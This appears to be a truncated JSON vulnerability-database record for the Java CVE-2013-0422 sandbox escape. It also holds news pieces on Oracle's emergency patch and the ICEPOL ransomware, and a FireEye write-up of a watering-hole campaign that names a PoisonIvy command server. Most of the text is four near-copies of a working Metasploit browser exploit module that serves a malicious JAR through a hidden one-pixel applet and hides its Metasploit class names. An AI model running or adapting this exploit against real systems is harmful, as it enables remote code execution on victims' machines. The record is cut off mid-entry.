2013'\r\n\t\t))\r\n\tend\r\n\r\n\r\n\tdef setup\r\n\t\tpath = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"cve-2013-0422\", \"Exploit.class\")\r\n\t\t@exploit_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\r\n\t\tpath = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"cve-2013-0422\", \"B.class\")\r\n\t\t@loader_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\r\n\r\n\t\t@exploit_class_name = rand_text_alpha(\"Exploit\".length)\r\n\t\t@exploit_class.gsub!(\"Exploit\", @exploit_class_name)\r\n\t\tsuper\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\tprint_status(\"handling request for #{request.uri}\")\r\n\r\n\t\tcase request.uri\r\n\t\twhen /\\.jar$/i\r\n\t\t\tjar = payload.encoded_jar\r\n\t\t\tjar.add_file(\"#{@exploit_class_name}.class\", @exploit_class)\r\n\t\t\tjar.add_file(\"B.class\", @loader_class)\r\n\t\t\tmetasploit_str = rand_text_alpha(\"metasploit\".length)\r\n\t\t\tpayload_str = rand_text_alpha(\"payload\".length)\r\n\t\t\tjar.entries.each { |entry|\r\n\t\t\t\tentry.name.gsub!(\"metasploit\", metasploit_str)\r\n\t\t\t\tentry.name.gsub!(\"Payload\", payload_str)\r\n\t\t\t\tentry.data = entry.data.gsub(\"metasploit\", metasploit_str)\r\n\t\t\t\tentry.data = entry.data.gsub(\"Payload\", payload_str)\r\n\t\t\t}\r\n\t\t\tjar.build_manifest\r\n\r\n\t\t\tsend_response(cli, jar, { 'Content-Type' => \"application/octet-stream\" })\r\n\t\twhen /\\/$/\r\n\t\t\tpayload = regenerate_payload(cli)\r\n\t\t\tif not payload\r\n\t\t\t\tprint_error(\"Failed to generate the payload.\")\r\n\t\t\t\tsend_not_found(cli)\r\n\t\t\t\treturn\r\n\t\t\tend\r\n\t\t\tsend_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })\r\n\t\telse\r\n\t\t\tsend_redirect(cli, get_resource() + '/', '')\r\n\t\tend\r\n\r\n\tend\r\n\r\n\tdef generate_html\r\n\t\thtml = %Q|<html><head><title>Loading, Please Wait...</title></head>|\r\n\t\thtml += %Q|<body><center><p>Loading, Please Wait...</p></center>|\r\n\t\thtml += %Q|<applet archive=\"#{rand_text_alpha(8)}.jar\" code=\"#{@exploit_class_name}.class\" width=\"1\" height=\"1\">|\r\n\t\thtml += %Q|</applet></body></html>|\r\n\t\treturn html\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/24045/"}], "metasploit": [{"lastseen": "2020-10-12T23:19:28", "description": "This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in January of 2013. The vulnerability affects Java version 7u10 and earlier.\n", "published": "2013-01-10T19:30:43", "type": "metasploit", "title": "Java Applet JMX Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0422"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/BROWSER/JAVA_JRE17_JMXBEAN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::EXE\n\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({ :javascript => false })\n\n def initialize( info = {} )\n\n super( update_info( info,\n 'Name' => 'Java Applet JMX Remote Code Execution',\n 'Description' => %q{\n This module abuses the JMX classes from a Java Applet to run arbitrary Java\n code outside of the sandbox as exploited in the wild in January of 2013. The\n vulnerability affects Java version 7u10 and earlier.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Vulnerability discovery\n 'egypt', # Metasploit module\n 'sinn3r', # Metasploit module\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-0422' ],\n [ 'OSVDB', '89059' ],\n [ 'US-CERT-VU', '625617' ],\n [ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],\n [ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ],\n [ 'URL', 'http://pastebin.com/cUG2ayjh' ] #Who authored the code on pastebin? I can't read Russian :-(\n ],\n 'Platform' => %w{ java linux osx win },\n 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },\n 'Targets' =>\n [\n [ 'Generic (Java Payload)',\n {\n 'Platform' => ['java'],\n 'Arch' => ARCH_JAVA,\n }\n ],\n [ 'Windows x86 (Native Payload)',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n }\n ],\n [ 'Mac OS X x86 (Native Payload)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X86,\n }\n ],\n [ 'Linux x86 (Native Payload)',\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86,\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2013-01-10'\n ))\n end\n\n\n def setup\n path = File.join(Msf::Config.data_directory, \"exploits\", \"cve-2013-0422\", \"Exploit.class\")\n @exploit_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\n path = File.join(Msf::Config.data_directory, \"exploits\", \"cve-2013-0422\", \"B.class\")\n @loader_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\n\n @exploit_class_name = rand_text_alpha(\"Exploit\".length)\n @exploit_class.gsub!(\"Exploit\", @exploit_class_name)\n super\n end\n\n def on_request_uri(cli, request)\n print_status(\"handling request for #{request.uri}\")\n\n case request.uri\n when /\\.jar$/i\n jar = payload.encoded_jar\n jar.add_file(\"#{@exploit_class_name}.class\", @exploit_class)\n jar.add_file(\"B.class\", @loader_class)\n metasploit_str = rand_text_alpha(\"metasploit\".length)\n payload_str = rand_text_alpha(\"payload\".length)\n jar.entries.each { |entry|\n entry.name.gsub!(\"metasploit\", metasploit_str)\n entry.name.gsub!(\"Payload\", payload_str)\n entry.data = entry.data.gsub(\"metasploit\", metasploit_str)\n entry.data = entry.data.gsub(\"Payload\", payload_str)\n }\n jar.build_manifest\n\n send_response(cli, jar, { 'Content-Type' => \"application/octet-stream\" })\n when /\\/$/\n payload = regenerate_payload(cli)\n if not payload\n print_error(\"Failed to generate the payload.\")\n send_not_found(cli)\n return\n end\n send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })\n else\n send_redirect(cli, get_resource() + '/', '')\n end\n\n end\n\n def generate_html\n html = %Q|<html><head><title>Loading, Please Wait...</title></head>|\n html += %Q|<body><center><p>Loading, Please Wait...</p></center>|\n html += %Q|<applet archive=\"#{rand_text_alpha(8)}.jar\" code=\"#{@exploit_class_name}.class\" width=\"1\" height=\"1\">|\n html += %Q|</applet></body></html>|\n return html\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/java_jre17_jmxbean.rb"}], "thn": [{"lastseen": "2017-01-08T18:01:26", "bulletinFamily": "info", "cvelist": ["CVE-2013-0422"], "description": "[](<http://2.bp.blogspot.com/-hmHfgVixQNI/UPbcy1J22jI/AAAAAAAAR4M/oWTQ6wJAx4E/s1600/Oracle+Patches+Java+Zero+Day+Vulnerability.jpg>)\n\nOracle delivered an unusual emergency patch to Java's critical Zero Day vulnerability on Sunday to fix a malicious bug that allowed hackers access to users web browsers. Exploits for the [previously undisclosed flaw were](<http://thehackernews.com/2013/01/exploit-packs-updated-with-new-java.html>) being hosted in a number of [exploit kits](<http://thehackernews.com/2012/09/blackhole-exploit-kit-20-released-with.html>) and attacks have already been seen in the wild dropping ransomware and assorted other malware.\n\n \n\n\nSecurity Alert [CVE-2013-0422](<http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html>) include two [vulnerabilities](<http://thehackernews.com/2012/12/hunting-vulnerabilities-in-scada.html>) that are remotely executable. Oracle confirmed that the flaws were only present in Java 7 versions and did not impact Java on servers, Java desktop applications, or embedded Java.\n\n \n \n\n\nJava is used in 3 billion machines, about 2 billion of which are desktop or laptop computers. Similarly, Back in August last year, Oracle issued an urgent fix to seal a dangerous security flaw within its Java software that\u2019s left thousands of computers wide open to malicious attacks from hackers.\n\n \n\n\n**_Lamar Bailey_**, director of security research and development for [nCircle](<https://www.ncircle.com/>) said, \u201c_We\u2019re just two weeks into 2013 and already we\u2019ve seen a surge of critical vulnerabilities and emergency patches. Oracle just added 86 new fixes to overloaded IT teams already struggling to keep up with emergency patches for Java, Internet Explorer and Ruby on Rails._ \n_ \n_ _No matter how far behind IT teams are, they can\u2019t afford to ignore this massive Oracle patch. Oracle Mobile Server has two CVEs that have a CVSS score of ten, that\u2019s as bad as it gets. There are also two MySQL vulnerabilities that can be exploited remotely. All of these should be patched as soon as possible_.\u201d \n \nJanuary Patch include 86 security updates across all major product lines including [Oracle Database](<http://thehackernews.com/2012/05/oracle-database-new-zero-day-exploit.html>) and MySQL Server. Patches for a number of Oracle applications were released Tuesday, including nine for Oracle E-Business Suite (7 of which are remotely exploitable), 12 in Oracle PeopleSoft (7 remotely exploitable), 10 in Oracle Siebel CRM (5 remotely exploitable), and one each in Oracle Supply Chain Products Suite and Oracle JD Edwards Products.\n", "modified": "2013-01-16T17:01:53", "published": "2013-01-16T06:01:00", "id": "THN:B322DFBE39D6B1984ECCA4237D6EB6EB", "href": "http://thehackernews.com/2013/01/oracle-patches-java-zero-day.html", "type": "thn", "title": "Oracle Patches Java Zero Day Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:42", "bulletinFamily": "info", "cvelist": ["CVE-2013-0422"], "description": "[](<https://3.bp.blogspot.com/-goylQ_crASs/UuoeOzUewsI/AAAAAAAAASk/xLNzzDSmUHQ/s1600/ICEPOL+Reveton+Ransomware+Trojan.jpg>)\n\nAfter Financial and Banking Malwares, Ransomware has become the first choice of money motivated cybercriminals.\n\n \n\n\nA new Ransomware Trojan known as **ICEPOL** has been one of those widespread malware which has been successfully installed approximately 267,786 times worldwide and 42,400 in the USA alone over a five month period, analyzed by the security firm [_BitDefender_](<http://www.presseportal.de/pm/52715/2651614/gemeinsame-aktion-mit-der-rumaenischen-polizei-bitdefender-hat-icepol-trojaner-untersucht>).\n\n \n\n\nThe** **ICEPOL Trojan** **categorized as Ransomware that locks your PC and demand for a ransom amount to unlock it. The Malware was using a previously known vulnerability in Java software i.e. [_CVE-2013-0422_](<http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html>) to infect the systems.\n\n \n\n\nThe malware threatened the user with accusations of illegal piracy or '_porn-related activity_' and requires money for exemption from punishment that pretends to be from the 'police'.\n\n \n\n\n\u201c_The ICEPOL Trojan extorted victims who downloaded it by sending them a message in any one of 25 languages purporting to be from police accusing them of downloading copyrighted material or illegal porn_,\u201d said Catalin Cosoi, Chief Security Strategist from Bitdefender.\n\n \n\n\nThe [malware](<https://thehackernews.com/search/label/Malware>) includes one more money making scheme, i.e. Designed to redirect the victims to the website via _pay-per-click_ scam under the traffic exchange mechanism. The police estimated that more than $32,000 was stolen from the U.S. victims over the five-month period.\n\n \n\n\nThe Romanian police in cooperation with the Internet security firm Bitdefender found dozens of C&C servers and successfully seized one of the major C&C servers, which was the part of large distribution of ICEPOL Trojans, located in the Romanian capital Bucharest.\n\n \n\n\n\u201c_The results of the investigation of ICEPOL Trojan based on cooperation with various law enforcement agencies and third party vendors. Despite the complex investigations, we have so far achieved very good results and we will continue to fight cybercrime_\", says the head of the agency against cyber crime, the Romanian National Police.\n\n \n\n\nThis is not the first time when a ransomware tricked the victims successfully, also last year [cryptolocker](<https://thehackernews.com/search/label/CryptoLocker>) of the same category hits millions of computer users. So, users are advised to keep their systems software and anti-virus solutions up-to-date and most importantly patch your Java distribution immediately to _Update 51_.\n\n \n\n\nStay Safe! Stay Tuned!\n", "modified": "2014-01-31T06:55:09", "published": "2014-01-29T22:48:00", "id": "THN:4EAA4FEF21F8E68A90003CC58D6639E2", "href": "https://thehackernews.com/2014/01/icepol-ransomware-servers-seized-by.html", "type": "thn", "title": "ICEPOL Ransomware Servers seized by Romanian Police that infected 260,000 Computers", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:18:05", "description": "", "published": "2013-01-11T00:00:00", "type": "packetstorm", "title": "Java Applet JMX Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0422"], "modified": "2013-01-11T00:00:00", "id": "PACKETSTORM:119472", "href": "https://packetstormsecurity.com/files/119472/Java-Applet-JMX-Remote-Code-Execution.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \nrequire 'rex' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::EXE \n \ninclude Msf::Exploit::Remote::BrowserAutopwn \nautopwn_info({ :javascript => false }) \n \ndef initialize( info = {} ) \n \nsuper( update_info( info, \n'Name' => 'Java Applet JMX Remote Code Execution', \n'Description' => %q{ \nThis module abuses the JMX classes from a Java Applet to run arbitrary Java \ncode outside of the sandbox as exploited in the wild in January of 2013. The \nvulnerability affects Java version 7u10 and earlier. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Unknown', # Vulnerability discovery \n'egypt', # Metasploit module \n'sinn3r', # Metasploit module \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2013-0422' ], \n[ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ], \n[ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ] \n], \n'Platform' => [ 'java', 'win', 'osx', 'linux' ], \n'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, \n'Targets' => \n[ \n[ 'Generic (Java Payload)', \n{ \n'Platform' => ['java'], \n'Arch' => ARCH_JAVA, \n} \n], \n[ 'Windows x86 (Native Payload)', \n{ \n'Platform' => 'win', \n'Arch' => ARCH_X86, \n} \n], \n[ 'Mac OS X x86 (Native Payload)', \n{ \n'Platform' => 'osx', \n'Arch' => ARCH_X86, \n} \n], \n[ 'Linux x86 (Native Payload)', \n{ \n'Platform' => 'linux', \n'Arch' => ARCH_X86, \n} \n], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jan 10 2013' \n)) \nend \n \n \ndef setup \npath = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"j7u10_jmx\", \"Exploit.class\") \n@exploit_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) } \npath = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"j7u10_jmx\", \"B.class\") \n@loader_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) } \n \n@exploit_class_name = rand_text_alpha(\"Exploit\".length) \n@exploit_class.gsub!(\"Exploit\", @exploit_class_name) \nsuper \nend \n \ndef on_request_uri(cli, request) \nprint_status(\"handling request for #{request.uri}\") \n \ncase request.uri \nwhen /\\.jar$/i \njar = payload.encoded_jar \njar.add_file(\"#{@exploit_class_name}.class\", @exploit_class) \njar.add_file(\"B.class\", @loader_class) \nmetasploit_str = rand_text_alpha(\"metasploit\".length) \npayload_str = rand_text_alpha(\"payload\".length) \njar.entries.each { |entry| \nentry.name.gsub!(\"metasploit\", metasploit_str) \nentry.name.gsub!(\"Payload\", payload_str) \nentry.data = entry.data.gsub(\"metasploit\", metasploit_str) \nentry.data = entry.data.gsub(\"Payload\", payload_str) \n} \njar.build_manifest \n \nsend_response(cli, jar, { 'Content-Type' => \"application/octet-stream\" }) \nwhen /\\/$/ \npayload = regenerate_payload(cli) \nif not payload \nprint_error(\"Failed to generate the payload.\") \nsend_not_found(cli) \nreturn \nend \nsend_response_html(cli, generate_html, { 'Content-Type' => 'text/html' }) \nelse \nsend_redirect(cli, get_resource() + '/', '') \nend \n \nend \n \ndef generate_html \nhtml = %Q|<html><head><title>Loading, Please Wait...</title></head>| \nhtml += %Q|<body><center><p>Loading, Please Wait...</p></center>| \nhtml += %Q|<applet archive=\"#{rand_text_alpha(8)}.jar\" code=\"#{@exploit_class_name}.class\" width=\"1\" height=\"1\">| \nhtml += %Q|</applet></body></html>| \nreturn html \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/119472/java_jre17_jmxbean.rb.txt"}], "zdt": [{"lastseen": "2018-03-03T03:42:40", "edition": 2, "description": "This Metasploit module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in January of 2013. The vulnerability affects Java version 7u10 and earlier.", "published": "2013-01-11T00:00:00", "type": "zdt", "title": "Java Applet JMX Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0422"], "modified": "2013-01-11T00:00:00", "id": "1337DAY-ID-20155", "href": "https://0day.today/exploit/description/20155", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::EXE\r\n\r\n include Msf::Exploit::Remote::BrowserAutopwn\r\n autopwn_info({ :javascript => false })\r\n\r\n def initialize( info = {} )\r\n\r\n super( update_info( info,\r\n 'Name' => 'Java Applet JMX Remote Code Execution',\r\n 'Description' => %q{\r\n This module abuses the JMX classes from a Java Applet to run arbitrary Java\r\n code outside of the sandbox as exploited in the wild in January of 2013. The\r\n vulnerability affects Java version 7u10 and earlier.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Unknown', # Vulnerability discovery\r\n 'egypt', # Metasploit module\r\n 'sinn3r', # Metasploit module\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-0422' ],\r\n [ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],\r\n [ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ]\r\n ],\r\n 'Platform' => [ 'java', 'win', 'osx', 'linux' ],\r\n 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },\r\n 'Targets' =>\r\n [\r\n [ 'Generic (Java Payload)',\r\n {\r\n 'Platform' => ['java'],\r\n 'Arch' => ARCH_JAVA,\r\n }\r\n ],\r\n [ 'Windows x86 (Native Payload)',\r\n {\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n }\r\n ],\r\n [ 'Mac OS X x86 (Native Payload)',\r\n {\r\n 'Platform' => 'osx',\r\n 'Arch' => ARCH_X86,\r\n }\r\n ],\r\n [ 'Linux x86 (Native Payload)',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86,\r\n }\r\n ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Jan 10 2013'\r\n ))\r\n end\r\n\r\n\r\n def setup\r\n path = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"j7u10_jmx\", \"Exploit.class\")\r\n @exploit_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\r\n path = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"j7u10_jmx\", \"B.class\")\r\n @loader_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\r\n\r\n @exploit_class_name = rand_text_alpha(\"Exploit\".length)\r\n @exploit_class.gsub!(\"Exploit\", @exploit_class_name)\r\n super\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n print_status(\"handling request for #{request.uri}\")\r\n\r\n case request.uri\r\n when /\\.jar$/i\r\n jar = payload.encoded_jar\r\n jar.add_file(\"#{@exploit_class_name}.class\", @exploit_class)\r\n jar.add_file(\"B.class\", @loader_class)\r\n metasploit_str = rand_text_alpha(\"metasploit\".length)\r\n payload_str = rand_text_alpha(\"payload\".length)\r\n jar.entries.each { |entry|\r\n entry.name.gsub!(\"metasploit\", metasploit_str)\r\n entry.name.gsub!(\"Payload\", payload_str)\r\n entry.data = entry.data.gsub(\"metasploit\", metasploit_str)\r\n entry.data = entry.data.gsub(\"Payload\", payload_str)\r\n }\r\n jar.build_manifest\r\n\r\n send_response(cli, jar, { 'Content-Type' => \"application/octet-stream\" })\r\n when /\\/$/\r\n payload = regenerate_payload(cli)\r\n if not payload\r\n print_error(\"Failed to generate the payload.\")\r\n send_not_found(cli)\r\n return\r\n end\r\n send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })\r\n else\r\n send_redirect(cli, get_resource() + '/', '')\r\n end\r\n\r\n end\r\n\r\n def generate_html\r\n html = %Q|<html><head><title>Loading, Please Wait...</title></head>|\r\n html += %Q|<body><center><p>Loading, Please Wait...</p></center>|\r\n html += %Q|<applet archive=\"#{rand_text_alpha(8)}.jar\" code=\"#{@exploit_class_name}.class\" width=\"1\" height=\"1\">|\r\n html += %Q|</applet></body></html>|\r\n return html\r\n end\r\n\r\nend\n\n# 0day.today [2018-03-03] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/20155"}], "fireeye": [{"lastseen": "2017-12-14T08:34:59", "bulletinFamily": "info", "cvelist": ["CVE-2011-3544", "CVE-2013-1288", "CVE-2013-0422"], "description": "On March 16th, we discovered a premeditated waterhole campaign that hosts exploits and malware on websites frequented by a specific target group. In this case the target includes Chinese dissidents. For the attacker, this approach is highly attractive since it is very difficult to discover the attacker\u2019s identity. Moreover, this attack is a form of social engineering, leveraging the fact that the target group visits specific websites. By exploiting these \u201cwatering holes\u201d the attacker benefits by investing little time in targeting.\n\nThis attack exploits a fresh vulnerability ([CVE-2013-1288](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1288>), [MS13-021](<http://technet.microsoft.com/en-us/security/bulletin/MS13-021>)) in Internet Explorer 8\u2014just four days after Microsoft released a patch. Why did attackers use a fresh vulnerability? Cost could be a factor. Zero-days tend to be expensive to either research or purchase on black markets.\n\nWe found this exploit being employed in attacks on two hacked Chinese news websites known to promote dissidence against the Chinese government. This is clearly a targeted attack on a very narrow portion of the Chinese populous. However, since cyber attackers are quick copycats, we expect this exploit to be replicated quickly. For this reason, anyone using IE 8 must install a patch immediately or upgrade their browser to new versions. Today, according to [W3Schools.com](<http://www.w3schools.com/browsers/browsers_explorer.asp>), IE is the third most popular browser with about 15% market share. In addition, IE 8 is used by half of all IE users.\n\nBased on the similarity in TTPs (Tools, Techniques, and Procedures), we believe the threat actor is the same as the one behind previous watering hole attacks targeting activists and people with certain political affiliations. In the past this campaign has used various hacked websites such as the Council on Foreign Relations or CFR, [Reporters Without Borders](<https://blog.avast.com:2013:01:22:reporters-without-borders-website-misused-in-wateringhole-attack:>), and a leading American university (that we cannot name).\n\nIn general, based on our observations, this watering hole attack is like many others we have observed: highly targeted and hard to trace\u2014indicative of a very sophisticated attacker. Why? The attack:\n\n * Used hacked websites to deliver the exploit to targeted groups of people. In this case it particularly targets certain group of Chinese speaking people.\n * Used hacked website to host exploit code and malware payload, and also second stage of payload, which makes it very hard to trace the origin of the attack.\n * Takes tremendous effort to compromise websites relevant to the target group. It would require knowledge of web application security.\n * Leverages the zero-day exploits and fresh exploits.\n * Was multi-stage, and the second stage of payload is encrypted and downloaded from a 404-like response page, and is injected dynamically. Once they shut down the operation, it\u2019s hard to trace the attacker\u2019s intention.\n\n[caption id=\"attachment_1348\" align=\"alignnone\" width=\"540\"] Figure 1[/caption]\n\n**Exploit technique**\n\n****The exploit code is hosted on a hacked religious website. This site hosts both IE ([CVE-2013-1288](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1288>)) and Java exploits ([CVE-2013-0422](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0422>), [CVE-2011-3544](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544>)). On mining our database we found that the web server has a history of hosting malware. We will focus on the chain of execution for the exploit. The first part of the exploit checks the language of browser, and constructs two separate ROP chains for English and Chinese languages as shown in Figure 2. The second part of the exploit is obfuscated and it triggers the vulnerability. Upon successful exploitation it will download a file dd.exe from the same server and execute it.\n\n[caption id=\"attachment_1349\" align=\"alignnone\" width=\"540\"] Figure 2[/caption]\n\n**Malware Payload:**\n\nThe file dd.exe (651fad35d276e5dedc56dfe7f3b5f125) is the stage 1 payload and makes the request show in in Figure 3. The response to this request is a HTML page. In the case of Java exploit we found it serving 9ac8277b848496b28279f57cb959e2fb.\n\n[caption id=\"attachment_1352\" align=\"alignnone\" width=\"539\"] Figure 3[/caption]\n\nThe HTML page displays a page not found message repeatedly using a script on the page if opened in the browser.\n\n[caption id=\"attachment_1374\" align=\"alignnone\" width=\"554\"] Figure 4[/caption]\n\nInterestingly the html page returned also contains Base64 encoded data within a script tag, which is in fact the stage 2 payload. This Base64 encoded data is decrypted and written to %AppData%\\network.inf. The decoded file is read in another part of the code and is subject to further transformations. The first 68 bytes of this the decoded data contains the decryption routine shown in Figure 5. It uses a rolling byte XOR decryption scheme and applies it to the data starting at offset 69. The decrypted data is position independent code, which is injected into an instance of iexplorer.exe launched in suspended state.\n\n[caption id=\"attachment_1350\" align=\"alignnone\" width=\"649\"] Figure 5[/caption]\n\nThis injected second stage payload is a Backdoor PoisonIvy RAT also discovered in other similar watering hole campaigns. This code attempts to connect to a remote server in Hong Kong over port 443. It uses a dynamic DNS provider with the hostname dd.tc.ikwb.com, which translates to 58.64.179.189. The server is not responding at the time of analysis. We found other domains associated with this IP address on robtex.com as shown in Figure 6.\n\n[caption id=\"attachment_1356\" align=\"alignnone\" width=\"378\"] Figure 6[/caption]\n\n**Similarity to previous watering hole campaigns:**\n\nLet us examine the techniques and code used in the current campaign and correlate it with previous attacks. It sets a cookie and forwards to the appropriate exploit page based on the version of the browser as shown in the code snippet below. This same cookie was found being set in earlier campaigns as well.\n\n` `\n\n[caption id=\"attachment_1375\" align=\"alignnone\" width=\"554\"] Figure 7[/caption]\n\nWhen we examine the Java exploit chain of execution we noticed that the code is similar and it re-uses the same naming convention, namely \u201cAppletHigh.jar\u201d and \u201cAppletLow.jar\u201d as shown in the code snippet below. The classnames and vulnerabilities used are also the same.\n\n[caption id=\"attachment_1376\" align=\"alignnone\" width=\"558\"] Figure 8[/caption]\n\nThe exploit traffic for three different campaigns is shown in Table 1. It is evident right away that there are similarities in the URI scheme and the exploit naming convention for Java attacks for the U.S. university and Chinese news site attacks. They both use AppletHigh.jar and AppletLow.jar.\n\nAs also noted by Jindrich Kubec and Eric Romang on their blog, today.swf from CFR attack was replaced by logo1229.swf. Similarly, news.html was replaced by DOITYOUR02.html and robots.txt was replaced by DOITYOUR01.txt. This establishes the similarity between the U.S. university attacks and the CFR attack.\n\n\n\nIn summary, the previous watering hole campaigns have the following similarities with the current attack:\n\n * The websites used for watering hole and hosting payloads are always compromised sites.\n * It sets a cookie with 1 day expiration and the name 'Somethingbbbbb'.\n * It checks the browser and its version.\n * If the browser is Internet Explorer and IE8, it delivers exploit targeting IE8(CVE-2013-1288) otherwise it triggers a java exploit based on the java version installed.\n * It uses similar naming conventions for exploit files. For** **example, if** **the java version is 7 or above it serves CVE-2013-0422 through **AppletHigh.jar** and else it serves CVE-2011-3544 through **AppletLow.jar.**\n * The URI patterns are similar across campaigns.\n * Similar RAT payloads were used in previous campaigns.\n\nOur very own Darien Kindlund has done a [detailed study](<http://www.issa.org/resource/resmgr/journalpdfs/feature0213.pdf>) on such premeditated watering hole attacks and mitigation strategies, which is a good read.\n\nWe want to acknowledge Microsoft\u2019s [MAPP](<http://www.microsoft.com/security/msrc/collaboration/mapp.aspx>) program for sharing intelligence with partners and helping us protect our customers.\n", "modified": "2013-03-20T17:26:00", "published": "2013-03-20T17:26:00", "id": "FIREEYE:4F902DE9FF06143FF34DC80FDBD2AC85", "href": "https://www.fireeye.com/blog/threat-research/2013/03/internet-explorer-8-exploit-found-in-watering-hole-campaign-targeting-chinese-dissidents.html", "type": "fireeye", "title": "Internet Explorer 8 Exploit Found in Watering Hole Campaign Targeting Chinese Dissidents", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2017-11-27T08:03:02", "bulletinFamily": "blog", "cvelist": ["CVE-2009-3869", "CVE-2010-0094", "CVE-2010-0188", "CVE-2010-0480", "CVE-2010-0840", "CVE-2010-0842", "CVE-2010-1297", "CVE-2010-3563", 